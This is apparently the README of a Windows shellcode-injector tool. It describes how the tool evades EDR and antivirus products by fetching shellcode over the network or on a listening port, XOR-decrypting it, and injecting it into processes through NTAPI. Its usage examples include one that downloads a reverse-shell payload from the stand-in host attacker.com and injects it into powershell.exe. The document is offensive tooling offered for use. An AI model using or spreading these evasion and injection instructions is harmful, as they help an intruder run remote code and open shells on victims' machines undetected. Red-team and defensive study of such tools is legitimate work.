elddy/Windows-NTAPI-Injector

Windows NTAPI shellcode injector

Injects shellcode kept in memory (downloaded or received over the network, never written to disk) into a process using the Windows native API (NTAPI), with the aim of evading EDR and antivirus products. The shellcode can be obtained in two ways:

  • Download the shellcode from a URL
  • Listen on a port and wait for the shellcode to be delivered

Usage

Usage:
        Injector.exe -u <URL> [-k <xor_key>]
        Injector.exe -p <PID/Process Name> -u <URL> [-k <xor_key>]
        Injector.exe -p <PID/Process Name> -l <LISTEN_PORT> [-k <xor_key>]
        Injector.exe -h
Options:
        -h       Show this menu.
        -u       URL to download the shellcode from (download mode; not combined with -l).
        -p       PID or process name of the target to inject into (optional).
        -l       Port to listen on for the shellcode (listen mode; not combined with -u).
        -k       XOR key used to decrypt the shellcode before injection.
        -s       Stealth mode: number of seconds to wait before decryption and injection start (default 18).
        -m       Injection mode: NT (native API) or normal (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread).

Examples

Download the shellcode and inject it into powershell.exe

injector.exe -u http://attacker.com/reverse_shell.bin -p powershell.exe

Wait for a connection on port 8080, receive the shellcode and inject it into an owned notepad.exe (no -p is given, so the default target is used)

injector.exe -l 8080
